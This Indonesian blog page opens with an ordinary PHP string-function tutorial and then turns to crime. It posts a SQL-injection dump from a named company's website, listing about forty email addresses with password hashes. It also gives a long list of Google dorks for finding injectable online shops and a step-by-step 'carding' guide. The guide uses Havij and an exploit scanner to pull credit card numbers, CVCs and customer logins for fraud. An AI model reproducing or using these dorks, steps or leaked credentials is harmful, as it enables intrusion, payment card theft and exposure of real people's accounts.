Pasang Iklan

Whatsapp : 0822 5516 1055

Total Pengunjung

Monday 24 August 2015

PHP String Lengkap

Fungsi String di PHP

  1. addslashes — Memberi garis miring pada tanda kutip
  2. chr — Menghasilkan karakter yang spesifik  berdasarkan kode ascii
  3. count_chars — Menghitung frekuensi munculnya karakter di suatu string
  4. explode — Membagi string menjadi array
  5. htmlspecialchars — Konversi karakter khusus ke HTML entities
  6. implode — Menggabungkan element array ke suatu string
  7. md5 — Menghasilkan enkripsi md5
  8. nl2br — Memasukan HTML <br> di setiap baris baru
  9. number_format — Format angka dengan dengan menggroupkan ribuan
  10. ord — Menghasilkan nilai ASCII suatu karakter
  11. parse_str — Mengubah string menjadi variabel
  12. print — Mencetak string, sama dengan echo
  13. str_pad — Menempatkan string ditempat yang panjangnya ditentukan
  14. str_repeat — Mengulang string
  15. str_replace — Mengganti string yang dicari dengan string pengganti
  16. str_shuffle — Mengacak string
  17. str_split — Mengubah string ke array
  18. str_word_count — Menghitung jumlah kata dalam string
  19. strip_tags — Menghilangkan tag HTML dan PHP
  20. stripslashes — Menghilangkan garis miring tanda kutip di string
  21. strlen — Mendapatkan panjang string
  22. strrev — Membalikkan string
  23. substr_replace — Mengganti teks pada bagian tertentu string
  24. substr — Menghasilkan bagian dari string

addslashes

Fungsi : Memberi garis miring atau slash jika ada tanda kutip pada string
Sintaks :

addslashes ( string $str )

Contoh :

<?php
$str = "Sekarang hari jum'at";

echo addslashes($str);
//Hasilnya : Sekarang hari jum\'at
?>

chr

Fungsi : Menghasilkan karakter yang spesifik berdasarkan kode ascii
Sintaks :

chr ( int $ascii )
Parameter :
$ascii = kode ascii
Contoh :

<?php
$kode = 81;
$str = chr($kode);
echo "karakter dengan kode ascii $kode adalah $str";
//Hasilnya : karakter dengan kode ascii 81 adalah Q
?>

count_chars

Fungsi : Menghitung frekuensi munculnya karakter di suatu string
Sintaks :

count_chars ( string $string [, int $mode= 0 ] )
Parameter :
$string = String yang ingin dihitung frekuensi karakter yang muncul
$mode = Opsional, Default = 0
  • 0 - Menghitung semua karakter dalam bentuk array, walaupun nggak ada di dalam string
  • 1 - Sama seperti 0, tapi hanya yang jumlah frekuensi besar dari 0, artinya hanya karakter yang ada di dalam string
  • 2 - Sama seperti 0, tapi hanya karakter yang jumlah frekuensinya sama dengan 0
Contoh :

<?php
$data = "Hello World";

foreach (count_chars($data, 1) as $i => $val) {
   echo "Ada $val buah karakter \"" , chr($i) , "\" di dalam string.\n<br>";
}
?>
Hasilnya :

Ada 1 buah karakter " " di dalam string. 
Ada 1 buah karakter "H" di dalam string. 
Ada 1 buah karakter "W" di dalam string. 
Ada 1 buah karakter "d" di dalam string. 
Ada 1 buah karakter "e" di dalam string. 
Ada 3 buah karakter "l" di dalam string. 
Ada 2 buah karakter "o" di dalam string. 
Ada 1 buah karakter "r" di dalam string. 

explode

Fungsi : Membagi string menjadi array berdasarkan string pembatas yang ditentukan
Sintaks :

explode ( string $delimiter , string $string [, int $limit ] )
Parameter :
$delimiter : string pembatas
$string : string yang akan dibagi
$limit : Batas maksimal elemen array yang dibuat
Contoh :

<?php
$str = 'one|two|three|four';

print_r(explode('|',$str));

// hanya 2 elemen array
print_r(explode('|', $str, 2));
?>
Hasilnya :

Array
(
    [0] => one
    [1] => two
    [2] => three
    [3] => four
)
Array
(
    [0] => one
    [1] => two|three|four
)

htmlspecialchars

Fungsi : Mengubah karakter < dan > menjadi &lt; dan &gt;. Ini sangat berguna untuk mencegah user yang menggunakan tag html ketika menginput data ke website kita, seperti melalui buku tamu, dan sebagainya.
Sintaks :

htmlspecialchars ( string $string )
Contoh :

<?php
$teks = "<b>hai apa kabar</b>";

echo htmlspecialchars($teks);
?>

implode

Fungsi : menggabungkan elemen array menjadi satu string
Sintaks :

implode ( [string $antara] , array $array )
Parameter :
$antara, string atau karakter antara elemen yang akan disatukan, bersifat opsional, bisa diisi atau tidak
$array, array yang akan disatukan.
Contoh :

<?php
$array = array('lastname', 'email', 'phone');
$teksbaru = implode("--",$array);

echo $teksbaru;
//hasilnya lastname--email--phone
?>

md5

Fungsi : untuk men-ekripsi string dengan teknik md5, bersifat satu arah, artinya tidak ada fungsi untuk mengembalikannya/dekripsi. Kecuali kalau pake kode hacking khusus
Sintaks :

md5 (string $string)
Contoh :

<?php
$password = "passwordku";

echo md5($password);
//Hasilnya : 88f200b77cccee4a6e95c383d33e0f22
?>

nl2br

Fungsi : mengubah baris baru (\n) menjadi <br>, berguna jika anda ingin ketika user input di teks area, kemudian menekan enter. Nah supaya ntar baris baru yang dibuat di teksarea bisa diampilkan harus diubah \n menjadi <br>
Sintaks :

nl2br ( string $string )

Contoh :

<?php
$teks = "Hai \n Apakabar";

$teks = nl2br($teks);

echo $teks;
?>

number_format

Format angka dengan dengan menggroupkan ribuan
Sintaks :

number_format ( float $number [, int $decimals ] )
atau
number_format ( float $number , int $decimals , string $dec_point , string $thousands_sep )
$number, adalah angka yang akan diformat
$decimals, adalah jumlah angka di belakang koma
$dec_point, adalah tanda desimal, apakah pake titik atau koma
$thousands_sep, adalah tanda pembagi ribuan, apakah koma atau titik atau lainnya
Contoh :

<?php
$number = 123564.56;

$format_number = number_format($number, 2, '.', ',');
echo $format_number;

//Hasil 123,564.56
?>

ord

Fungsi : Menghasilkan nilai ASCII suatu karakter, kebalikan dari fungsi chr()
Sintaks :

ord ( string $string )
Contoh :

<?php
$str = "x";

echo ord($str);
//Hasilnya 120
?>

parse_str

Fungsi : Mengubah string menjadi variabel
Sintaks :

parse_str ( string $str [, array &$arr ] )
Parameter :
$str, adalah string yang akan di ubah, anda juga bisa membuat string menjadi variabel seperti metode GET, contoh : file.php?nama=desrizal&alamat=tembagapura
$arr, adalah outputnya dalam bentuk array
Contoh :

<?php
$str = "nama=Desrizal&email=drz@desrizal.com";
parse_str($str);
echo $nama;                 // Hasilnya Desrizal
echo $email;                // Hasilnya drz@desrizal.com

parse_str($str, $output);
echo $output['nama'];       // Hasilnya Desrizal
echo $output['email']       // Hasilnya drz@desrizal.com
?>

print

Fungsi : sama seperti echo, menghasilkan/mencetak string
Sintaks :

print (String $str )
Contoh :

<?php
print("Hello World");
?>

str_pad

Fungsi : Menempatkan string ditempat yang panjangnya ditentukan
Sintaks

str_pad ( string $input , int $pad_length [, string $pad_string= " " [, int $pad_type= STR_PAD_RIGHT ]] )
Parameter :
$input, adalah string input
$pad_length, adalah panjang pad
$pad_string, adalah string mengisi kekosongan
$pad_type, adalah tipe pad, kanan (STR_PAD_RIGHT), kiri( STR_PAD_LEFT), atau tengah( STR_PAD_BOTH)
Contoh :

<?php
$input = "Desrizal";
echo str_pad($input, 15)."<br>";                      // Hasil "Desrizal       "
echo str_pad($input, 15, "-=", STR_PAD_LEFT)."<br>";  // Hasil "-=-=-=-Desrizal"
echo str_pad($input, 15, "_", STR_PAD_BOTH)."<br>";   // Hasil "___Desrizal____"
echo str_pad($input, 15 , "___")."<br>";              // Hasil "Desrizal_______"
?>

str_repeat

Fungsi : mengulang string
Sintaks :

str_repeat ( string $input , int $multiplier )
Parameter :
$input, adalah string yang akan diulang
$multiplier, berapa kali diulang
Contoh :

<?php
echo str_repeat("x", 10);
//hasilnya xxxxxxxxxx
?>

str_replace

Fungsi : Mengganti string yang dicari dengan string pengganti
Sintaks :

str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] )
Parameter :
$search, adalah bagian string yang akan di ganti
$replace, adalah string pengganti
$subject, adalah string yang akan diproses
$count, jumlah bagian yang cocok dan diganti
Contoh :

<?php
$str = "Hello Apa kabar";
$str2 = str_replace("a","x",$str,$count);
echo $str2."<br>";
echo $count;
//Hasil : Hello Apx kxbxr
//hasil 3
?>

str_shuffle

Fungsi : mengacak string
Sintaks :

str_shuffle ( string $str )
Contoh :

<?php
echo str_shuffle("Desrizal");

//Hasilnya macam macam bisa : zDisalre
?>

str_split

Fungsi : Mengubah string ke array
Sintaks :

str_split ( string $string [, int $split_length= 1 ] )
$string, adalah string yang akan di ubah
$split_length adalah maksimum panjang potongan
Contoh :

<?php
$str = "Hello Friend";

$arr1 = str_split($str);
$arr2 = str_split($str, 2);

print_r($arr1);
print_r($arr2);
?>
Hasilnya :

Array
(
    [0] => H
    [1] => e
    [2] => l
    [3] => l
    [4] => o
    [5] =>  
    [6] => F
    [7] => r
    [8] => i
    [9] => e
    [10] => n
    [11] => d
)
Array
(
    [0] => He
    [1] => ll
    [2] => o 
    [3] => Fr
    [4] => ie
    [5] => nd
)

str_word_count

Fungsi : Menghitung jumlah kata dalam string
Sintaks :

str_word_count ( string $string [, int $format= 0 [, string $charlist ]] )
Parameter :
$string, adalah string yang akan dihitung
$format
  • 0 - jumlah kata yang ditemukan
  • 1 - Menghasilkan suatu array yang merupakan semua kata yang ditemukan dalam string
  • 2 - Menghasilkan array asosiatif
$charlist, karakter tambahan yang dianggap kata
Contoh :

<?php
$str = "Budi pergi ke pasar";

echo str_word_count($str);
//hasilnya 4
?>

strip_tags

Fungsi : Menghilangkan tag HTML dan PHP
Sintaks :

strip_tags ( string $str [, string $allowable_tags ] )
Parameter :
$str, string yang akan dihilangkan tag HTML nya
$allowable_tags, adalah tag yang tidak akan dihilangkan
Contoh :

<?php
$teks = "<b>Hallo apa kabar</b>";

echo strip_tags($teks);
?>

stripslashes

Fungsi : Menghilangkan garis miring tanda kutip di string
Sintaks :

stripslashes ( string $str )
Contoh :

<?php
$str = "Sekarang hari jum\'at";

echo stripslashes($str);
// Hasil: Sekarang hari jum'at
?>

strlen

Fungsi : Mendapatkan panjang string
Sintaks :

<?php
$str = 'abcdef';
echo strlen($str); // hasil 6

$str = ' ab cd ';
echo strlen($str); // hasil 7
?>

strrev

Fungsi : Membalikkan string
Sintaks :

strrev ( string $string )
Contoh :

<?php
echo strrev("Hello world!"); // Hasil "!dlrow olleH"
?>

substr_replace

Fungsi : Mengganti teks pada bagian tertentu string
Sintaks :

substr_replace ( mixed $string , string $replacement , int $start [, int $length ] )
Parameter :
$string, adalah string yang akan diproses/diganti
$replacement, adalah string pengganti dari substring yang ditentukan
$start, adalah sub string diawali dari karakter ke berapa
$length, adalah panjang sub string
Contoh :

<?php
$teks = "Desrizal";
echo substr_replace($teks, 'bob', 3, 2);
//hasilnya : Desbobzal
?>

substr

Fungsi : Menghasilkan bagian dari string
Sintaks :

substr ( string $string , int $start [, int $length ] )
Parameter :
$string, adalah string yang akan diambil bagiannya
$start, posisi awal karakter yang akan diambil
$length, adalah panjang dari subs string
Contoh :

<?php
echo substr("Desrizal", 3)."<br>";          //Hasilnya rizal
echo substr("Desrizal", 3, 2)."<br>";       //Hasilnya ri
echo substr("Desrizal", -3)."<br>";         //Hasilnya zal
echo substr("Desrizal", -3, 2)."<br>";      //Hasilnya za
?>


sumber

Saturday 22 August 2015

Hack Bumitama.com

Target: http://www.bumitama.com/human.php?id=%Inject_Here%3%27
Date: 8/22/2015 10:21:49 PM
DB Detection: MySQL (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
Data Base: admbumi_bt
Table: user
Total Rows: 40


user_id pwd level
bom.denni@gmail.com b38f98ff54f54dd3735e3f6c224e2f27 02
ikhsan_11@ymail.com b19fc4712defc80b9d49d5f2f30af0e3 02
azmi_2810@yahoo.co.id 05077461ead9292e8e4e2074fc927e3d 02
samesame.agro@gmail.com bdaa9d37902340a9d72c1b273a3c5b1f 02
first_fundy@yahoo.com 5f532a3fc4f1ea403f37070f59a7a53a 02
hery_husodo@yahoo.com 395e857ace2590526c97f5bba537d6d7 02
shikonno.tama@yahoo.com 28ef36b35ae8cb1f542578f03408b512 02
nafriantosp@yahoo.co.id 71c1034c146999f0282851868c660444 02
efendi02@ymail.com 58926509cab8d4edbf2170c841086fda 02
princess.books@yahoo.co.uk 69d369ec727df1720d9880526259b761 02
fannybjm@yahoo.co.id 247fd024385652edf0eca383919445a4 02
yahdi.miftahuddin@yahoo.co.id d44db74c8a2bc64379b519bf73695eac 02
misbachst4@gmail.com d6e71ebdf2ee196105727b5964d13915 02
a.setiawan@nas.co.id 41591fa3a697604be431ef66b5f53572 02
donny_priatna@ymail.com 2f59558fafe81e85752b8741c34d3614 02
nattaradja@yahoo.co.id 4297f44b13955235245b2497399d7a93 02
R.rais@ymail.com e10adc3949ba59abbe56e057f20f883e 02
asfi_yanor@yahoo.com 0b308b9abaec66559dfef454c86b0642 02
nurkholishrasyid@yahoo.co.id bae46ce6405d58fec5eb87a145248a16 02
twentymant@yahoo.co.id 3529efeb8fa29f76d20adf8bdf9ff88b 02
taufiqurrahman.ghazali@gmail.com 28071ba6c0a1c8251ac4c96ff2d54a71 02
guntursaputra99@yahoo.co.id 6275e26419211d1f526e674d97110e15 02
adejoko_cheiby@yahoo.com b609e1729edfcb93d4056f8e988d586f 02
ardian.24@gmail.com c66c443024266cc43cc2e179d66d463a 02
Bjm2411@yahoo.co.id c62f3d40c9c4e28b4bc52599441ecc72 02
bisam_aza@yahoo.co.id 7977eca8a12cdfa6fe41f23433c15bc2 02
misran_ian@yahoo.com b7500f909c9da8fbf9521996c4f1055b 02
endro_333@yahoo.co.id 027be5b048e60e64f1b4a346f8ef0909 02
her_bjm@yahoo.co.id 23f40850d25ec70996ca07a09171df3f 02
psycobanjars@yahoo.com c1c1ca4e6d5d422d4ed5cfba1b024e96 02
irone70@gmail.com 768b90469e0f0341b89c8e79e5b0b009 02
risman8@ymail.com 106f0bb87e7c619df5f3ab3f95c7423b 02
iyal_mcom@yahoo.com f227141848d66cb2d0921157499edf47 02
stefenkp@gmail.com 215debc07eed4c8b8f0e24590f7661f0 02
opixs_jbg@yahoo.com dec40d8b97faab6d3103dddc82fad1ce 02
yopi15marintu@yahoo.com f73f270bea488f6991a370e7bf9c1e41 02
warissektiono@gmail.com 2e5beb16b303b5b985353e818f60d624 02
drnazar.keepsmile@gmail.com 5f3678d985e1e8fd7a8dd26863794c3d 02
dodybudianto@ymail.com 189f56104cb2425b723ffcf9082b869f 02

DORK CARDING TERBARU



:mysql_fetch_array() expects parameter 1to be resource, boolean given on line





  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
show_item_details.cfm?item_id=
showbook.cfm?bookid=
shprodde.cfm?SKU=

showStore.cfm?catID=
specials.cfm?id=
store_listing.cfm?id=

store.cfm?id=
store_bycat.cfm?id=
storefront.cfm?id=

Store_ViewProducts.cfm?Cat=
store-details.cfm?id=
StoreRedirect.cfm?ID=

storefronts.cfm?title=
storeitem.cfm?item=
subcategories.cfm?id=
tuangou.cfm?bookid=

tek9.cfm?
template.cfm?Action=Item&pid=
topic.cfm?ID=
type.cfm?iType=
view_cart.cfm?title=

updatebasket.cfm?bookid=
updates.cfm?ID=
view.cfm?cid=
view_detail.cfm?ID=
viewitem.cfm?recor=

viewcart.cfm?CartId=
viewCart.cfm?userID=
viewCat_h.cfm?idCategory=
viewevent.cfm?EventID=
WsAncillary.cfm?ID=

viewPrd.cfm?idcategory=
ViewProduct.cfm?misc=
voteList.cfm?item_ID=
whatsnew.cfm?idCategory=
WsPages.cfm?ID=HP
inurl:".php?cid="+intext:"online+betting"

inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy Now/"+site:.net
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"/store/"

inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?cid=" intext:"Buy Now"

inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cat="

inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat=" intext:"/store/"

inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?catid=" intext:"shopping"

inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?categoryid=" intext:"Buy Now"

inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"
inurl:".php?categoryid="
inurl:".php?categoryid=" intext:"View cart"
inurl:".php?categoryid=" intext:"Toys"

inurl:".php?categoryid=" intext:"add to cart"
inurl:".php?categoryid=" intext:"shopping"
inurl:".php?categoryid=" intext:"boutique"
inurl:".php?categoryid=" intext:"/store/"
inurl:".php?categoryid=" intext:"/shop/"
inurl:".php?pid="
inurl:".php?pid=" intext:"toys"

inurl:".php?pid=" intext:"shopping"
inurl:".php?pid=" intext:"add to cart"
inurl:".php?pid=" intext:"Buy Now"
inurl:".php?pid=" intext:"View cart"
inurl:".php?pid=" intext:"boutique"
inurl:".php?pid=" intext:"/store/"
inurl:".php?pid=" intext:"/shop/"
inurl:".php?prodid=" intext:"/shop/"

inurl:".php?prodid=
inurl:".php?prodid=" intext:"shopping"
inurl:".php?prodid=" intext:"add to cart"
inurl:".php?prodid=" intext:"Buy Now"
inurl:".php?prodid=" intext:"View cart"
inurl:".php?prodid=" intext:"boutique"
inurl:".php?prodid=" intext:"/store/"
inurl:".php?productid=" intext:"/store/"

inurl:".php?prodid=" intext:"toys"
inurl:".php?productid='
inurl:".php?productid=" intext:"shopping"
inurl:".php?productid=" intext:"add to cart"
inurl:".php?productid=" intext:"Buy Now"
inurl:".php?productid=" intext:"View cart"
inurl:".php?productid=" intext:"boutique"
inurl:".php?product=" intext:"boutique"

inurl:".php?productid=" intext:"/shop/"
inurl:".php?productid=" intext:"Toys"
inurl:".php?product="
inurl:".php?product=" intext:"shopping"
inurl:".php?product=" intext:"add to cart"
inurl:".php?product=" intext:"Buy Now"
inurl:".php?product=" intext:"View cart"
inurl:".php?product=" intext:"/store/"
inurl:".php?products=" intext:"boutique"

inurl:".php?product=" intext:"/shop/"
inurl:".php?product=" intext:"toys"
inurl:".php?product=" intext:"DVD"
inurl:".php?products="
inurl:".php?products=" intext:"shopping"
inurl:".php?products=" intext:"add to cart"
inurl:".php?products=" intext:"Buy Now"
inurl:".php?products=" intext:"View cart"
inurl:".php?products=" intext:"/store/"
inurl:".php?proid=" intext:"/store/"

inurl:".php?products=" intext:"/shop/"
inurl:".php?products=" intext:"toys"
inurl:".php?products=" intext:"DVD"
inurl:".php?proid="
inurl:".php?proid=" intext:"shopping"
inurl:".php?proid=" intext:"add to cart"
inurl:".php?proid=" intext:"Buy Now"
inurl:".php?proid=" intext:"View cart"
inurl:".php?proid=" intext:"boutique"
inurl:".php?proid=" intext:"/shop/"
inurl:".php?itemid="

inurl:".php?proid=" intext:"toys"
inurl:".php?shopid="
inurl:".php?shopid=" intext:"shopping"
inurl:".php?shopid=" intext:"add to cart"
inurl:".php?shopid=" intext:"Buy Now"
inurl:".php?shopid=" intext:"View cart"
inurl:".php?shopid=" intext:"boutique"
inurl:".php?shopid=" intext:"/store/"
inurl:".php?shopid=" intext:"/shop/"
inurl:".php?shopid=" intext:"Toys"
inurl:".php?orderid=" intext:"add to cart"

inurl:".php?itemid=" intext:"shopping"
inurl:".php?itemid=" intext:"add to cart"
inurl:".php?itemid=" intext:"Buy Now"
inurl:".php?itemid=" intext:"View cart"
inurl:".php?itemid=" intext:"boutique"
inurl:".php?itemid=" intext:"/shop/"
inurl:".php?itemid=" intext:"/store/"
inurl:".php?itemid=" intext:"Toys"
inurl:".php?orderid="
inurl:".php?orderid=" intext:"shopping"
inurl:".php?catalogId=" intext:"View cart"

inurl:".php?orderid=" intext:"Buy Now"
inurl:".php?orderid=" intext:"View cart"
inurl:".php?orderid=" intext:"boutique"
inurl:".php?orderid=" intext:"/shop/"
inurl:".php?orderid=" intext:"/store/"
inurl:".php?orderid=" intext:"Toys"
inurl:".php?catalogId="
inurl:".php?catalogId=" intext:"shopping"
inurl:".php?catalogId=" intext:"add to cart"
inurl:".php?catalogId=" intext:"Buy Now"
inurl:".php?aid=" intext:"/store/"

inurl:".php?catalogId=" intext:"boutique"
inurl:".php?catalogId=" intext:"/shop/"
inurl:".php?catalogId=" intext:"/store/"
inurl:".php?catalogId=" intext:"Toys"
inurl:".php?aid="
inurl:".php?aid=" intext:"shopping"
inurl:".php?aid=" intext:"add to cart"
inurl:".php?aid=" intext:"Buy Now"
inurl:".php?aid=" intext:"View cart"
inurl:".php?aid=" intext:"boutique"
inurl:".php?aid=" intext:"/shop/"
inurl:".php?articleid=" intext:"add to cart"

inurl:".php?aid=" intext:"toys"
inurl:".php?artid="
inurl:".php?artid=" intext:"shopping"
inurl:".php?artid=" intext:"add to cart"
inurl:".php?artid=" intext:"Buy Now"
inurl:".php?artid=" intext:"View cart"
inurl:".php?artid=" intext:"boutique"
inurl:".php?artid=" intext:"/shop/"
inurl:".php?artid=" intext:"/store/"
inurl:".php?artid=" intext:"toys"
inurl:".php?articleid="
inurl:".php?articleid=" intext:"shopping"
index.cfm?pageid=

inurl:".php?articleid=" intext:"Buy Now"
inurl:".php?articleid=" intext:"View cart"
inurl:".php?articleid=" intext:"boutique"
inurl:".php?articleid=" intext:"/shop/"
inurl:".php?articleid=" intext:"/store/"
inurl:".php?articleid=" intext:"toys"
cat.asp?cat=
productlist.asp?catalogid=
Category.asp?category_id=
Category.cfm?category_id=
category.asp?cid=
category.cfm?cid=
category.asp?cat=
category.cfm?cat=
category.asp?id=
category.asp?catid=
search_results.cfm?txtsearchParamCat=

Category.asp?c=
Category.cfm?c=
productlist.cfm?catalogid=
productlist.asp?catalogid=
viewitem.asp?catalogid=
viewitem.cfm?catalogid=
catalog.cfm?catalogId=
catalog.asp?catalogId=
department.cfm?dept=
department.asp?dept=
itemdetails.cfm?catalogId=
itemdetails.asp?catalogId=
product_detail.asp?catalogid=
product_detail.cfm?catalogid=
product_list.asp?catalogid=
product_list.cfm?catalogid=
ShowProduct.cfm?CatID=
ShowProduct.asp?CatID=
displayproducts.cfm?category_id=

search_results.asp?txtsearchParamCat=
itemdetails.cfm?catalogId=
itemdetails.asp?catalogId=
store-page.cfm?go=
store-page.asp?go=
Detail.cfm?CatalogID=
Detail.asp?CatalogID=
browse.cfm?category_id=
view.cfm?category_id=
products.cfm?category_id=
index.cfm?Category_ID=
detail.cfm?id=
category.cfm?id=
showitems.cfm?category_id=
ViewProduct.asp?PID=
ViewProduct.cfm?PID=
shopdisplayproducts.asp?catalogid=
shopdisplayproducts.cfn?catalogid=
displayproducts.asp?category_id=
product.php?product_id=

DisplayProducts.asp?prodcat=
DisplayProducts.cfm?prodcat=x
productDetail.cfm?ProductID=
products.php?subcat_id=
showitem.cfm?id=21
productdetail.cfm?pid=
default.cfm?action=46
products_accessories.asp?CatId=
Store_ViewProducts.asp?Cat=
category.cfm?categoryID=
category.asp?category=
tepeecart.cfm?shopid=
view_product.asp?productID=
ProductDetails.asp?prdId=12
products.cfm?ID=
detail.asp?product_id=
product_detail.asp?product_id=
products.php?subcat_id=
view_product.cfm?productID=
displayproducts.cfm?id=

product_details.asp?prodid=
shopdisplayproducts.cfm?id=

Carding trick simple

Selamat Datang Bagi Pemula Yang Ingin Belajar Cara Carding. Langsung Saja Kita Ke Topik Pembahasan Oke.


Pertama Siapkan Dulu Alat Tempur Kita.

Alat :
-Havij v1.16 Pro >>>DOWNLOAD DISINI<<<
-Gr3n0x Exploit Scanner >>>DOWNLOAD DISINI<<<
-Dork WebShop Terbaru >>>DOWNLOAD DISINI<<< 

Penjelasan Alat :
Havij = Tools Yang Kita Gunakan Untuk Mencari Isi Database Dalam Sebuah Web
Gr3n0x = Scanner Yang Digunakan Untuk Mencari Web VULN
Dork = Sebuah Coding Yang Mempermudah Mencari Website Yang Akan Kita Scan Di Gr3n0x Nanti
Contoh Dork Webshop : inurl:".php?cat="+intext:"/Buy Now/"+site:.net

Oke,Setelah Alat / Bahannya Sudah Di Download Langsung Aja Kita Mulai

-Pilih Salah Satu Dork Yang Menurut Kamu Bagus Dan Banyak Targetnya
- Copy Kan Ke Gr3n0x Exploit Scanner
-Klik Search, Dan Tunggu Sampai Muncul Hasil Disebelah Kiri
-Setelah Hasil Muncul, Klik Start, Dan Tunggu Sampai Muncul Hasil Disebelah Kanan Yang Merupakan Web VULN, Dan Akan Kita Scan Di Havij

Setelah Kita Mendapatkan Web VULN Dari Gr3n0x, Kita Beralih Ke Havij.

-Buka Havij
-Copy Kan Web Vuln Hasil Dari Gr3n0x Tadi
-Klik Analze

-Tunggu Sampai Muncul Nama Database 
-Jika DatabaseTidak Muncul, Ganti Lagi Web Vuln Nya Sampai Yang Ada Databasenya
-Jika Sudah Mendaptkan Database Dari Web Tersebut
-Klik Table
-Checklist Databasenya
-Klik Get Table
-Akan Muncul Data Table Dari Website,Checklist Yang Menurut Kamu Ada Data Data CC / Email (Biasanya : Customer,Order,Member,User,Dan Lain Lain Lah)
-Lalu Klik Get Column
-Dan Akan Muncul Data Column, Cari Yang Ada Tulisan : Email,Password,Atau Data Data CC Seperti (CC Num , CC Exp , CVC , Cardholder)
-Dan Terakhir, Klik GET DATA


Dan,Eng Ing Eng.....Apakah Kamu Dapat ?
Jika Dapat Yah Tinggal Scan Aja Di Cheker Kesayanganmu

Kalau Belum Dapat Juga,Ya Terus Berusaha...Jangan Pernah Bosan, Namanya Juga Belajar Mana Ada Yang Instant...Kalau Mau Instant,ke KLINIK TONGFANG Aja Sono.

sumber

Popular Posts

@jablayInside. Powered by Blogger.
Scroll To Top